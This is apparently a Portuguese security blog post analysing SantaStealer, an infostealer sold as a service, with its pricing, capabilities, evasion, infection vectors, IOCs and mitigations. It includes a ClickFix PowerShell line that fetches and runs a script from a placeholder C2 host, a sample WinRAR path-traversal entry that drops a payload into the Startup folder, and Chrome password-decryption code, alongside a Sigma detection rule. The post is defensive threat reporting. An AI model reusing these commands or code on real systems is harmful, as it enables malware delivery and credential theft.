SantaStealer: Novo Infostealer MaaS Ameaça Windows

A temporada natalícia de 2025 trouxe um “presente” indesejado para o mundo da cibersegurança: o SantaStealer, um novo infostealer-as-a-service que está a revolucionar o mercado de malware. Neste artigo do Blog Dolutech, vamos analisar profundamente esta ameaça emergente que já está a ser promovida agressivamente em canais underground e representa um risco significativo para organizações e utilizadores individuais.

O Que é o SantaStealer?

O SantaStealer é um infostealer sofisticado oferecido como Malware-as-a-Service (MaaS), anteriormente conhecido como BluelineStealer antes de passar por um rebranding estratégico. Descoberto pelos investigadores da Rapid7 Labs no início de dezembro de 2025, este malware foi oficialmente lançado a 16 de dezembro de 2025, tornando-se imediatamente operacional no ecossistema do cibercrime.

A Dolutech identificou que este stealer representa uma evolução preocupante no mercado de malware, combinando acessibilidade económica com capacidades técnicas avançadas. Desenvolvido completamente em linguagem C, o SantaStealer promete aos seus operadores a capacidade de extrair dados sensíveis em apenas 20 segundos após a infecção.

Características Técnicas Principais

O malware foi arquitetado com 14 módulos personalizados de recolha de dados, cada um executando em thread separada para maximizar a eficiência. A infraestrutura técnica inclui:

Bibliotecas Estáticas Integradas:

• cJSON para processamento de dados JSON
• miniz como biblioteca de compressão alternativa ao zlib
• sqlite3 para interface com bases de dados SQLite

Capacidades de Extração:

• Credenciais guardadas em 23 browsers diferentes (Chrome, Firefox, Edge, Opera, Brave, entre outros)
• Cookies e tokens de sessão ativos
• Dados de 15 carteiras de criptomoeda diferentes
• Conteúdo do clipboard em tempo real
• Dados de aplicações populares (Discord, Steam, Telegram)
• Documentos sensíveis do sistema de ficheiros
• Dados de formulários de preenchimento automático
• Histórico de navegação e bookmarks

Modelo de Negócio e Distribuição

O SantaStealer está a ser comercializado através de canais Telegram e fóruns underground russos, nomeadamente no fórum Lolz. O modelo de subscrição apresenta duas variantes:

Plano Basic: $175 USD mensais

• Acesso ao painel de controlo web
• 14 módulos de recolha de dados
• Suporte técnico básico
• Atualizações regulares

Plano Premium: $300 USD mensais

• Todas as funcionalidades do plano Basic
• Opções de configuração avançadas
• Binding de ficheiros personalizados
• Suporte prioritário
• Builder de exportação WinRAR

Nós, no Blog Dolutech, alertamos que este modelo de pricing acessível democratiza o acesso a capacidades avançadas de roubo de informação, permitindo que cibercriminosos com conhecimentos técnicos limitados lancem campanhas sofisticadas.

Exploração do CVE-2025-8088: A Vulnerabilidade WinRAR

Uma característica particularmente preocupante é a inclusão de um builder de exportação WinRAR que explora a vulnerabilidade CVE-2025-8088 (CVSS 8.4). Esta falha de path traversal no WinRAR permite que atacantes:

1. Incorporem payloads maliciosos em Alternate Data Streams (ADS)
2. Manipulem caminhos de extração usando sequências de traversal (..)
3. Depositem ficheiros em diretórios sensíveis (pasta Startup do Windows)
4. Estabeleçam persistência automática no sistema

Exemplo Técnico de Exploração:

# Estrutura do arquivo RAR malicioso
documento.pdf
documento.pdf:..\..\..\..\Users\[USERNAME]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\payload.exe

# Após extração, o payload é colocado na pasta Startup
# Execução automática no próximo login

A vulnerabilidade afeta todas as versões do WinRAR até 7.12, tendo sido corrigida na versão 7.13 lançada a 30 de julho de 2025. O grupo APT russo RomCom já explorou ativamente esta falha desde 18 de julho de 2025.

Técnicas de Evasão e Anti-Análise

Apesar das promessas publicitárias de ser “totalmente indetectável”, a análise da Rapid7 revelou que as amostras iniciais do SantaStealer apresentam fraquezas significativas de segurança operacional:

Falhas Identificadas:

• Mais de 500 símbolos exportados com nomes descritivos (payload_main, check_antivm, browser_names)
• Strings não encriptadas no código
• Ficheiros DLL não ofuscados
• Dados exfiltrados enviados via HTTP não encriptado (porta 6767)

No entanto, o malware implementa várias técnicas anti-análise:

Verificações Anti-VM:

• Deteção de layouts de teclado russo (evita sistemas CIS)
• Verificação de processos bloqueados via checksums personalizados
• Deteção de nomes de computadores suspeitos
• Verificação de uptime do sistema
• Deteção baseada em tempo para debuggers

Bypass de AppBound Encryption:

O SantaStealer incorpora um executável adicional baseado no projeto ChromElevator que utiliza:

• Reflective process hollowing baseado em syscalls diretos
• Injeção em processos legítimos do browser
• Decriptação de chaves AppBound Encryption usando ChaCha20
• Acesso a credenciais protegidas sem alertas imediatos

# Exemplo conceitual de bypass DPAPI
import win32crypt

def decrypt_chrome_password(encrypted_password):
    # SantaStealer usa DPAPI para descriptografar
    decrypted = win32crypt.CryptUnprotectData(encrypted_password)
    return decrypted

Vetores de Infecção Primários

A Dolutech identificou os seguintes vetores de distribuição mais prováveis para o SantaStealer:

1. Ataques ClickFix

Técnica emergente onde utilizadores são induzidos a executar comandos PowerShell maliciosos:

# Exemplo de comando ClickFix usado em campanhas
powershell -NoProfile -ExecutionPolicy Bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://malicious-c2[.]com/loader.ps1')"

2. Software Pirata e Cracks

Distribuição através de:

• Torrents de software crackeado
• Keygens falsos
• Cheats para videojogos
• Plugins e extensões não verificados

3. Phishing e Malspam

Campanhas de email com:

• Anexos RAR maliciosos explorando CVE-2025-8088
• Lures temáticos (currículos, faturas, documentos financeiros)
• URLs para sites de download falsos

4. Malvertising e SEO Poisoning

• Anúncios maliciosos em motores de busca
• Sites falsos posicionados no topo dos resultados
• Imitação de páginas de download legítimas

Processo de Exfiltração de Dados

O SantaStealer segue um fluxo operacional meticulosamente projetado:

1. Execução: Verificação anti-VM e anti-análise
2. Coleta: 14 módulos executam simultaneamente em threads separadas
3. Processamento: Dados escritos em memória (operação fileless)
4. Compressão: Arquivo ZIP criado em memória
5. Chunking: Divisão em blocos de 10MB
6. Exfiltração: Envio para C2 via HTTP não encriptado (porta 6767)
7. Entrega: Logs disponibilizados via Telegram e painel web

Impacto e Ameaças Derivadas

Nós alertamos para as consequências em cascata de uma infecção por SantaStealer:

Ameaças Imediatas:

• Account takeover em massa de contas corporativas e pessoais
• Roubo de fundos de carteiras de criptomoeda
• Acesso não autorizado a email corporativo e SaaS
• Comprometimento de contas de redes sociais

Ameaças Secundárias:

• Venda de “logs” em mercados clandestinos (Russian Market, Genesis Market)
• Utilização de credenciais para ataques de ransomware
• Movimentação lateral em redes corporativas
• Espionagem industrial e roubo de propriedade intelectual

Impacto no Compliance:

• Violações de RGPD com multas até 4% do faturamento global
• Não conformidade com NIS2 e DORA
• Obrigações de notificação ao CNCS e CERT.PT

Estratégias de Mitigação Abrangentes

A Dolutech recomenda uma abordagem em múltiplas camadas para defesa contra o SantaStealer:

Controles Técnicos Essenciais

1. Atualização Urgente do WinRAR

# Verificar versão instalada do WinRAR
# Versões vulneráveis: ≤ 7.12
# Versão segura: ≥ 7.13

# Atualizar para WinRAR 7.13 ou superior imediatamente

2. Configuração de EDR/Antivírus Avançado

Implemente soluções com:

• Deteção comportamental (não apenas baseada em assinaturas)
• Monitorização de WinAPI abuse (T1555.003)
• Análise de tráfego HTTP POST anómalo
• Deteção de process hollowing e injeção
• Hunting para chamadas DPAPI suspeitas

Exemplo de Regra de Deteção Sigma:

title: SantaStealer Data Exfiltration Detection
status: experimental
description: Deteta padrões de exfiltração típicos do SantaStealer
logsource:
  category: network_connection
  product: windows
detection:
  selection:
    DestinationPort: 6767
    Protocol: TCP
    ImageLoaded|contains:
      - 'chrome.exe'
      - 'firefox.exe'
      - 'msedge.exe'
  condition: selection
falsepositives:
  - Conexões legítimas à porta 6767 (baixa probabilidade)
level: high

Hardening de Browsers

// Configurações Chrome via Group Policy
// Desabilitar armazenamento de senhas no browser
{
  "PasswordManagerEnabled": false,
  "CredentialsEnableService": false,
  "SyncDisabled": true
}

Application Allowlisting

# Implementar AppLocker para bloquear executáveis em pastas graváveis
New-AppLockerPolicy -RuleType Path -Path "C:\Users\*\AppData\*" -RuleNamePrefix "Block-AppData" -Deny

Controles Administrativos

1. Autenticação Multi-Fator Resistente a Phishing

Implementar:

• FIDO2 / WebAuthn
• Chaves de segurança físicas (YubiKey, Titan)
• Passkeys quando disponível
• EVITAR: MFA baseado apenas em SMS ou TOTP (vulnerável a session hijacking)

2. Política de Gestão de Credenciais

- Utilizar gestores de passwords corporativos (1Password, Bitwarden Enterprise)
- Proibir armazenamento de credenciais em browsers
- Implementar rotação automática de senhas a cada 90 dias
- Exigir senhas únicas para cada serviço (min. 16 caracteres)

3. Segmentação de Rede

• Implementar arquitetura Zero Trust
• Microsegmentação de redes críticas
• Monitorização de tráfego East-West
• Isolamento de estações de trabalho comprometidas

4. Monitorização Proativa

# Verificar por indicadores de compromisso
# Monitorizar conexões à porta 6767
netstat -ano | findstr ":6767"

# Verificar processos suspeitos
Get-Process | Where-Object {$_.Path -like "*AppData\Local\Temp*"}

# Analisar tarefas agendadas recentes
Get-ScheduledTask | Where-Object {$_.Date -gt (Get-Date).AddDays(-7)}

Controles de Consciencialização

Programa de Formação Obrigatório:

1. Reconhecimento de Phishing Avançado
   • Identificação de lures temáticos (CVs, faturas)
   • Verificação de domínios suspeitos
   • Análise de anexos RAR/ZIP antes de abrir
2. Higiene de Software
   • Nunca descarregar software de fontes não oficiais
   • Evitar cracks, keygens e software pirata
   • Verificar assinaturas digitais de ficheiros
   • Utilizar apenas repositórios oficiais (Microsoft Store, site oficial)
3. Gestão de Credenciais
   • Não reutilizar senhas entre serviços pessoais e corporativos
   • Não armazenar credenciais em browsers
   • Utilizar apenas gestores de senhas aprovados
   • Ativar MFA em todos os serviços disponíveis

Indicadores de Compromisso (IOCs)

A Dolutech compilou os seguintes indicadores técnicos para deteção:

Hashes SHA-256 de Amostras:

1a27... (DLL variant)
926a... (EXE variant)

Padrões de Rede:

# Conexões C2
- Porta: 6767/TCP
- Protocolo: HTTP não encriptado
- User-Agent: Customizado (varia por build)
- Chunk size: 10MB

Artefactos de Sistema:

# Localizações comuns
C:\Users\[USER]\AppData\Local\Temp\*
C:\Users\[USER]\AppData\Roaming\*
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
%TEMP%\*.zip

Processos Suspeitos:

- node.exe com argumentos incomuns
- chrome.exe com processos filhos anómalos
- powershell.exe com flags -NoProfile -ExecutionPolicy Bypass
- wscript.exe / cscript.exe em diretórios de utilizador

Contexto do Mercado MaaS em 2025

O SantaStealer surge num contexto preocupante do ecossistema de infostealers. Dados da KELA e SpyCloud revelam:

• 3.9 mil milhões de credenciais comprometidas em 2025
• 4.3 milhões de dispositivos infetados documentados
• 66% dos dispositivos infetados tinham EDR instalado
• 58% de aumento em ataques de infostealers comparado com 2024
• 70% dos dispositivos infetados são pessoais (BYOD risk)

Competidores no mercado MaaS incluem:

• Lumma Stealer: Recentemente desmantelado por autoridades
• StealC V2: $200/mês, 66% bypass rate de EDR
• Acreed: Nova variante com ML para priorização de alvos
• Nexus Stealer: Especializado em password managers

Conformidade Regulatória Europeia

As organizações sujeitas a regulamentação europeia devem considerar:

NIS2 (Diretiva UE 2022/2555):

• Obrigação de implementar medidas técnicas adequadas
• Notificação de incidentes em 24 horas ao CSIRT nacional
• Penalizações até €10 milhões ou 2% do faturamento global

DORA (Regulamento UE 2022/2554):

• Entidades financeiras devem garantir resiliência operacional digital
• Testes de penetração obrigatórios incluindo cenários de infostealer
• Framework de gestão de riscos de terceiros

RGPD (Regulamento UE 2016/679):

• Credenciais roubadas constituem violação de dados pessoais
• Notificação à autoridade supervisora em 72 horas
• Comunicação aos titulares dos dados se alto risco

Conclusão

O SantaStealer representa uma ameaça significativa e crescente no panorama de cibersegurança de 2025. A sua disponibilização como serviço a preços acessíveis, combinada com capacidades técnicas avançadas e exploração de vulnerabilidades zero-day recentes (CVE-2025-8088), torna este infostealer particularmente perigoso.

Nós, na Dolutech, enfatizamos que a defesa eficaz contra esta ameaça requer uma abordagem holística que combine:

• Controlos técnicos robustos (EDR, segmentação, monitorização)
• Práticas administrativas rigorosas (MFA resistente, gestão de credenciais)
• Formação contínua de utilizadores
• Conformidade com frameworks regulatórios europeus

As organizações não podem confiar apenas em soluções perimetrais ou antivírus tradicionais. A taxa de bypass de 66% em soluções EDR demonstra que é imperativo adotar uma postura de segurança centrada na identidade, assumindo que a comprometimento eventual é inevitável e preparando-se adequadamente para deteção e resposta rápidas.

O mercado de infostealers continuará a evoluir rapidamente. Permanecer informado sobre ameaças emergentes como o SantaStealer e adaptar continuamente as defesas é essencial para proteger ativos críticos e dados sensíveis no ambiente digital de 2025.